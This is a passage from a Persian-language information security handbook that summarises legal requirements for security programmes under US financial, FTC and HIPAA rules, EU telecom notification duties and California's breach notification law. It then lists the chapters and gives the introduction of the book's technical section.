ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺫﻳﻞ ﺑﺎﺷﺪ:
•
ﻲ ﻗﺎﺑﻞ ﭘﻴﺶﺑﻴﻨﻲ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ
ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟ ﹺ
ﺍﻓﺸﺎﺳﺎﺯﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ،ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ،ﺗﻐﻴﻴـﺮ ﻭ ﻳـﺎ ﺍﻧﻬـﺪﺍﻡ
ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻳﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺧﺮﻳـﺪﺍﺭﺍﻥ
ﺍﺳﺖ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﺩ.
•
ﺍﺣﺘﻤﺎﻝ ﻭ ﭘﺘﺎﻧﺴﻴﻞ ﺑﻪ ﻓﻌﻠﻴﺖ ﻧﺮﺳﻴﺪﻥ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺭﺍ ﺑـﺎ
ﺗﻮﺟﻪ ﺑﻪ ﺣﺴﺎﺳﻴﺖ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﺪ.
Financial Services Modernization
95
•
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺍﺟـﺮﺍﻱ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﻣﻮﺯﺵ ﺑﺒﻴﻨﻨﺪ .ﺑﺮﺭﺳﻲ ﻣﻨﻈﻢ ﺍﻳـﻦ ﻛﻨﺘﺮﻟﻬـﺎ،
ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺗﻐﻴﻴﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ،ﺣـﺴﺎﺳﻴﺖ
ﺍﻃﻼﻋﺎﺕ ﻣﺸﺘﺮﻳﺎﻥ ،ﺗﻬﺪﻳﺪﺍﺕ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ ،ﻭ
ﺗﻐﻴﻴﺮ ﺑﺮﻧﺎﻣﻪﺭﻳـﺰﻱ ﻛـﺎﺭﻱ ﺳـﺎﺯﻣﺎﻥ ﻣﺜـﻞ ﺍﺩﻏـﺎﻡ ﻳـﺎ ﺍﺗﺤـﺎﺩ ﺑـﺎ
ﺳﺎﺯﻣﺎﻧﻲ ﺩﻳﮕﺮ ،ﻭ ﻳﺎ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﻳﺎ ﺷﺮﻛﺘﻬﺎﻱ ﺧـﺎﺭﺝ
ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ .ﺍﻳﻦ ﻗﻮﺍﻧﻴﻦ ﻫﻴﺄﺕ ﻣﺪﻳﺮﺓ ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ
ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺘﺒﻲ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺭﺍ
ﺗﺄﻳﻴﺪ ﻧﻤﺎﻳﻨﺪ ﻭ ﺑﺮ ﻃﺮﺍﺣﻲ ،ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻃـﺮﺡ )ﺷـﺎﻣﻞ
ﻣﺴﺌﻮﻟﻴﺖ ﺍﺟﺮﺍﻱ ﻃﺮﺡ ﻭ ﺑﺮﺭﺳﻲ ﮔﺰﺍﺭﺷـﻬﺎﻱ ﻣـﺪﻳﺮﻳﺘﻲ( ﻧﻈـﺎﺭﺕ ﻛﻨﻨـﺪ.
ﻗﻮﺍﻧﻴﻦ ﻣﺸﺎﺑﻪ ﻛﻤﻴﺴﻴﻮﻥ ﺗﺠﺎﺭﺕ ﻣﻠﻲ ،ﻣﺆﺳـﺴﺎﺕ ﻣـﺎﻟﻲ ﺗﺤـﺖ
ﻗﻠﻤﺮﻭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺗﻬﻴﺔ ﻃﺮﺣﻲ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺆﺳﺴﺎﺕ
ﺑﺎﻳﺪ:
•
ﻳﻚ ﻳﺎ ﭼﻨﺪ ﻛﺎﺭﻣﻨﺪ ﺭﺍ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻨﺪ؛
Intrusion Monitoring Systems
Intrusion Response Programs
96
97
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ( ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ "ﻫﺮ ﻣﺆﺳﺴﻪ ﻣـﺎﻟﻲ ﻣـﺴﺌﻮﻟﻴﺖ
ﻣﺪﺍﻭﻣﻲ ﺑﺮﺍﻱ ﺍﺣﺘﺮﺍﻡ ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺩﺍﺭﺩ ﻭ
ﺑﺎﻳﺪ ﺍﺯ ﺍﻣﻨﻴﺖ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ ﺷﺨـﺼﻲ ﻭ ﻏﻴﺮﻋﻤـﻮﻣﻲ
ﺧﺮﻳﺪﺍﺭﺍﻥ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﻛﻨﺪ ".ﺑﺮ ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ،ﮔﺮﺩﺍﻧﻨﺪﮔﺎﻥ
ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻧﻴﺎﺯﻣﻨـﺪ ﺗـﺼﻮﻳﺐ ﻗـﻮﺍﻧﻴﻦ ﻣـﺪﻳﺮﻳﺘﻲ ﻭ ﻓﻨـﻲ ﻭ
ﻫﻤﭽﻨــﻴﻦ ﺍﻧﺠــﺎﻡ ﺣﻔﺎﻇــﺖ ﻓﻴﺰﻳﻜــﻲ ﺑــﺮﺍﻱ ﺍﻣﻨﻴــﺖ ﺍﻃﻼﻋــﺎﺕ
ﻣﻲ ﺑﺎﺷﻨﺪ .ﻧﻜﺘﻪ ﻣﻬـﻢ ﺍﻳﻨﺠﺎﺳـﺖ ﻛـﻪ ﺍﻳـﻦ ﺿـﻮﺍﺑﻂ ﻣـﺸﺨﺺ
ﻧﻜﺮﺩﻩﺍﻧﺪ ﻛﻪ ﭼﻪ ﺍﺟﺰﺍﻱ ﻓﻨﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ؛ ﻟﺬﺍ
ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﻗﺎﻧﻮﻥ ﺗﺼﻤﻴﻢ ﺩﺭ ﻣﻮﺭﺩ ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺧـﺎﺹ ﺭﺍ
ﺑﻪ ﺳﺎﺯﻣﺎﻥ ﻭﺍﮔﺬﺍﺭ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﻛﻔﺎﻳــﺖ ﺳﻴﺎﺳــﺘﻬﺎ ،ﻓﺮﺁﻳﻨــﺪﻫﺎ ،ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋــﺎﺕ
ﺧﺮﻳﺪﺍﺭﺍﻥ ﻭ ﺳﺎﻳﺮ ﺍﻗﺪﺍﻣﺎﺕ ﻛﻨﺘﺮﻝ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
٢٥٤
•
ﺩﺭ ﻫﺮ ﺑﺨﺶ ﺍﺯ ﺣﻮﺯﻩﻫﺎﻱ ﻋﻤﻠﻴـﺎﺗﻲ ﺷـﺮﻛﺖ ﻣﺨـﺎﻃﺮﺍﺗﻲ
ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﺮﻳـﺪﺍﺭﺍﻥ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ ﻣـﺸﺨﺺ ﻭ
ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﻨﺪ ﻭ ﺍﺛﺮﺑﺨﺸﻲ ﺳﻴﺴﺘﻢ ﻛﻨﻮﻧﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺁﻥ
ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨﺪ؛
•
ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺣﻔﺎﻇﺘﻲ ﺭﺍ ﻃﺮﺍﺣﻲ ﻭ ﺍﺟﺮﺍ ﻛﻨﻨﺪ ﻭ ﺁﻧـﺮﺍ ﺑﻄـﻮﺭ
ﻣﻨﻈﻢ ﻣﻮﺭﺩ ﺁﺯﻣﺎﻳﺶ ﻭ ﺍﺻﻼﺡ ﻗﺮﺍﺭ ﺩﻫﻨﺪ؛
•
ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪﮔﺎﻥ ﻣﻨﺎﺳﺐ ﺧﺪﻣﺎﺕ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻭ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺒﻨﺪﻧﺪ؛ ﻭ
•
ﺑﺮﻧﺎﻣﻪ ﻫﺎ ﺭﺍ ﺩﺭ ﺷﺮﺍﻳﻂ ﻭﺍﻗﻌﻲ )ﻣﺜﻞ ﺗﻐﻴﻴﺮ ﺳـﺎﺧﺘﺎﺭ ﻳـﺎ ﻋﻤﻠﻴـﺎﺕ
ﺳﺎﺯﻣﺎﻥ( ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺍﺻـﻼﺡ ﻛﻨﻨـﺪ ﻭ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﻧﺘـﺎﻳﺞ
ﺁﺯﻣﺎﻳﺶ ،ﻓﺮﺁﻳﻨﺪ ﻧﻈﺎﺭﺕ ﺭﺍ ﻧﻴﺰ ﺍﺭﺯﻳﺎﺑﻲ ﻭ ﺍﺻﻼﺡ ﻧﻤﺎﻳﻨﺪ.
ﺭﻭﻳﻜﺮﺩ ﻣﺸﺎﺑﻬﻲ ﺩﺭ ﻗـﺎﻧﻮﻥ ﻣـﺴﺌﻮﻟﻴﺖ ﺑﻴﻤـﺔ ﺧـﺪﻣﺎﺕ ﺩﺭﻣـﺎﻧﻲ
ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ٩٨ﺑﻪ ﭼﺸﻢ ﻣـﻲ ﺧـﻮﺭﺩ ﻛـﻪ ﻣﺆﺳـﺴﺎﺕ ﺧـﺪﻣﺎﺕ
ﺑﻬﺪﺍﺷﺘﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ
ﻛﻨﻨﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺑﻴﻤﺎﺭ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺫﺧﻴﺮﻩ ﺷﺪﻩ ﻫﻤـﻮﺍﺭﻩ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺩﻭﺭ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ
ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﺪ .ﻃﺒﻖ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﺰﻡ ﺑـﻪ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻣﻨﺎﺳﺐ ﻭ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍﻫﺒﺮﻱ ،ﻓﻴﺰﻳﻜﻲ ﻭ ﻓﻨﻲ ﻫﺴﺘﻨﺪ
ﺗﺎ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﭘﺰﺷـﻜﻲ ﺍﺷـﺨﺎﺹ ﺩﺭ
ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻣﻨﻴﺘﻲ ﭘﻴﺶ ﺑﻴﻨﻲﺷـﺪﻩ ﻭ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻣﺠـﺎﺯ
ﺣﻔﻆ ﺷﻮﻧﺪ .ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺑﺮﺍﻱ ﺫﺧﻴـﺮﻩ ﻭ ﺍﻧﺘﻘـﺎﻝ ﺩﺍﺩﻩﻫـﺎ ﺍﻋﻤـﺎﻝ
ﻣﻲﺷﻮﺩ ﻭ ﺩﺍﺭﺍﻱ ۲۸ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻭ ۴۱ﺷﺮﺡ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺖ.
ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﺍﻇﻬﺎﺭ ﻣﻲﺩﺍﺭﺩ ﻛﻪ ﻓﺮﺁﻳﻨﺪﻫﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﺎﻳـﺪ
ﺑﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻓﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺛﺒﺖ ،ﻫﺰﻳﻨـﺔ ﺍﻗـﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘـﻲ،
ﻧﻴﺎﺯ ﺁﻣﻮﺯﺷﻲ ﻛﺎﺭﻛﻨﺎﻥ ،ﻭ ﺍﺭﺯﺵ ﺑﺮﺭﺳﻲ ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﺭﺩﮔﻴـﺮﻱ ﺩﺭ
ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺩﺭﻧﻈﺮ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ .ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ،
ﻋﻤﻠﻴﺎﺕ ﺣﻔﺎﻇﺘﻲ ﻛﻪ "ﻻﺯﻡ" ﻭ "ﻗﺎﺑﻞ ﺗﻮﺟﻪ" ﻫﺴﺘﻨﺪ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ
ﻣﻲ ﻛﻨﻨﺪ .ﻧﻜﺎﺕ ﺍﺻﻠﻲ ﻗـﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘـﻲ ﻛـﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ
ﻣﺆﺳﺴﺎﺕ ﻭﺍﻗﻊ ﺷﻮﻧﺪ ،ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
•
ﺍﺯ ﻣﺤﺮﻣﺎﻧﮕﻲ ،ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺍﻃﻼﻋﺎﺗﻲ
ﻛﻪ ﺗﻮﺳﻂ ﻣﺆﺳﺴﻪ ﺍﻳﺠﺎﺩ ،ﺩﺭﻳﺎﻓﺖ ،ﻧﮕﻬـﺪﺍﺭﻱ ﻳـﺎ ﺍﻧﺘﻘـﺎﻝ
ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺣﺼﻮﻝ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻴﺪ؛
•
ﺍﺯ ﺳﻴﺴﺘﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺗﻲ ﻛﻪ ﺍﻣﻨﻴﺖ ﻳـﺎ ﻳﻜﭙـﺎﺭﭼﮕﻲ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻪ ﺧﻄﺮ ﻣﻲﺍﻧﺪﺍﺯﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ؛
United State’s Health Insurance Portability
and Accountability Act
98
•
ﺍﺯ ﻫﺮ ﻛـﺎﺭﺑﺮﺩ ﻭ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﻃﺒـﻖ ﺿـﺎﺑﻄﻪ
ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﻧﻴﺴﺖ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ؛ ﻭ
•
ﺍﺯ ﻫﻤﺎﻫﻨﮕﻲ ﻧﻴﺮﻭﻱ ﻛﺎﺭ ﺑﺎ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ.
ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻳﻦ ﻗﺎﻧﻮﻥ ﻗﺎﺑﻞ ﺍﻧﻌﻄﺎﻑ ﺍﺳﺖ:
•
ﻣﺆﺳﺴﺎﺕ ﻣﺸﻤﻮﻝ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ
ﻛﻨﻨــﺪ ﺗــﺎ ﺑﻄــﻮﺭ ﻣﻨﻄﻘــﻲ ﻭ ﻣﻨﺎﺳــﺐ ﺍﻳــﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻤﺎﻳﻨﺪ؛
•
ﺩﺭ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﭼﻪ ﺑﺎﺷﻨﺪ ،ﺑﺎﻳﺪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺖ:
oﺍﻧﺪﺍﺯﻩ ،ﭘﻴﭽﻴﺪﮔﻲ ،ﻭ ﮔﺴﺘﺮﺓ ﺁﻥ؛
oﺯﻳﺮﺳﺎﺧﺖ ﻓﻨﻲ ،ﺳـﺨﺖ ﺍﻓـﺰﺍﺭ ،ﻭ ﻗﺎﺑﻠﻴـﺖ ﺍﻣﻨﻴﺘـﻲ
ﻧﺮﻡﺍﻓﺰﺍﺭ؛
oﻫﺰﻳﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ؛ ﻭ
oﺍﺣﺘﻤﺎﻝ ﻭ ﺣﺴﺎﺳﻴﺖ ﻫﺮﻳﻚ ﺍﺯ ﻣﺨﺎﻃﺮﺍﺕ.
ﺭﻭﻳﻜﺮﺩ ﺩﻳﮕﺮ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﻄﻮﺭ ﻋﻤﻮﻣﻲ ،ﺿﻌﻔﻬﺎ
ﻭ ﻋﻴﻮﺏ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﻋﻤﻠﻜـﺮﺩ ﺳﻴـﺴﺘﻢ ﻭ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ
ﺍﻣﻨﻴﺖ ،ﻣﻨﺘﺸﺮ ﺳـﺎﺯﻧﺪ .ﻗـﻮﺍﻧﻴﻦ ﺍﺗﺤﺎﺩﻳـﺔ ﺍﺭﻭﭘـﺎ ﺍﺭﺍﺋـﻪ ﻛﻨﻨـﺪﮔﺎﻥ
ﺧﺪﻣﺎﺕ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﺸﺘﺮﻛﺎﻥ ﺭﺍ ﺍﺯ ﺧﻄﺮﺍﺗـﻲ
ﻛﻪ ﺑﻮﺍﺳﻄﺔ ﺗﺨﻠﻒ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺷﺒﻜﻪ ﺁﻧﻬﺎ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨـﺪ )ﻭ
ﻫﻤﭽﻨﻴﻦ ﻫﺰﻳﻨﺔ ﺍﺣﺘﻤﺎﻟﻲ ﺁﻥ( ﺁﮔﺎﻩ ﻧﻤﺎﻳﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺩﺭ ﺟـﻮﻻﻱ
۲۰۰۳ﺩﺭ ﺍﻳﺎﻟﺖ ﻛﺎﻟﻴﻔﺮﻧﻴﺎ ﻗﺎﻧﻮﻧﻲ ﺗﺼﻮﻳﺐ ﺷﺪ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﻫـﺮ
ﺷﺮﻛﺘﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ ﺳﺎﻛﻨﺎﻥ ﻛﺎﻟﻴﻔﺮﻧﻴـﺎ ﺭﺍ ﻧﮕﻬـﺪﺍﺭﻱ
ﻣﻲﻛﻨﺪ ،ﻣﻮﻇﻒ ﺑﻪ ﺁﮔﺎﻩ ﺳـﺎﺧﺘﻦ ﺁﻧـﺎﻥ ﺍﺯ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﺣﺘﻤـﺎﻟﻲ
ﺣﺎﺻﻞ ﺍﺯ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺩﺳﺘﺮﺳـﻲ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ ﺑـﻪ ﺁﻥ
ﺍﻃﻼﻋﺎﺕ ﻣﻲﺑﺎﺷﺪ.
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ
ﻓﺼﻞ .۲ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﱪﺍﻥ
ﻓﺼﻞ .۳ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﻓﺼﻞ .۴ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
ﻓﺼﻞ .۵ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
ﻓﺼﻞ .۶ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﻓﺼﻞ .۷ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ
ﻓﺼﻞ .۸ﺍﻧﻮﺍﻉ ﲪﻼﺕ ﻭ ﺭﻭﺵﻫﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﺎ
ﻓﺼﻞ .۹ﻛﺸﻒ ﻭﻣﺪﻳﺮﻳﺖ ﻧﻔﻮﺫ
ﻓﺼﻞ .۱۰ﻧﻜﺎﺕ ﻭﻳﮋﻩ ﺑﺴﺘﺮﻫﺎﻱ ﳐﺘﻠﻒ
٢٥٧
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﺼﻞ ﺍﻭﻝ
ﻣﻘﺪﻣﻪ
ﺧﻼﺻﻪ ﺑﺨﺸﻬﺎﻱ ۱ﺗﺎ ۴
ﺣﺎﻝ ﻛﻪ ﺑﻪ ﻓﻨﻲﺗﺮﻳﻦ ﻛﺘﺎﺏ ﺭﺳﻴﺪﻩﺍﻳﻢ ،ﻣﺮﻭﺭﻱ ﺑﺮ ﺁﻧﭽﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ۱ﺗﺎ ۴ﺩﺭﺑﺎﺭﺓ ﺁﻥ ﺑﺤﺚ ﺷﺪ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻪ ﻳﺎﺩ ﻣﻲﺁﻭﺭﻳﻢ ﻛﻪ:
ﺑﺨﺶ ۱ﻛﺘﺎﺏ ﻳﻚ ﻣﻌﺮﻓﻲ ﺍﺟﻤﺎﻟﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ ﺍﺭﺍﺋﻪ ﻛﺮﺩ .ﺍﻳﻦ ﺑﺨﺶ ﮔﺴﺘﺮﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ITﻭ ﺑﺮﺧـﻲ
ﺍﻋﻤﺎﻝ ﺗﺨﺎﺻﻢﺁﻣﻴﺰ ﺩﺭ ﻣﺤﻴﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﺭﺍ ﺷﺮﺡ ﺩﺍﺩ ،ﻭ ﻣﺸﺨﺺ ﻛﺮﺩ ﻛﻪ ﭼـﺮﺍ ﺧـﻂ ﻣـﺸﻲﻫـﺎ ﻭ ﺩﺍﻧـﺶ ﺍﻣﻨﻴﺘـﻲ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ،
ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ،ﻳﺎ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺿﺮﻭﺭﻱ ﺍﺳﺖ.
ﺑﺨﺶ ۲ﺑﻪ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﻋﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺨﺼﻲ ،ﻣﻨﺎﺑﻊ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﺷﺒﻜﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺷﺖ .ﺍﻳﻦ ﺑﺨﺶ ﻣﺴﺎﺋﻞ ﻛﻠﻴﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻧﻔﺮﺍﺩﻱ ﺭﺍ ﺩﺭ ﺑﺮ
ﮔﺮﻓﺖ ﻭ ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﻓﻨﻲ ﺍﺭﺍﺋﻪ ﺩﺍﺩ ﻛﻪ ﺍﮔﺮ ﺩﺭﺳﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ،ﺗﻬﺪﻳﺪ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﻣﻲﺭﺳﺎﻧﻨﺪ.
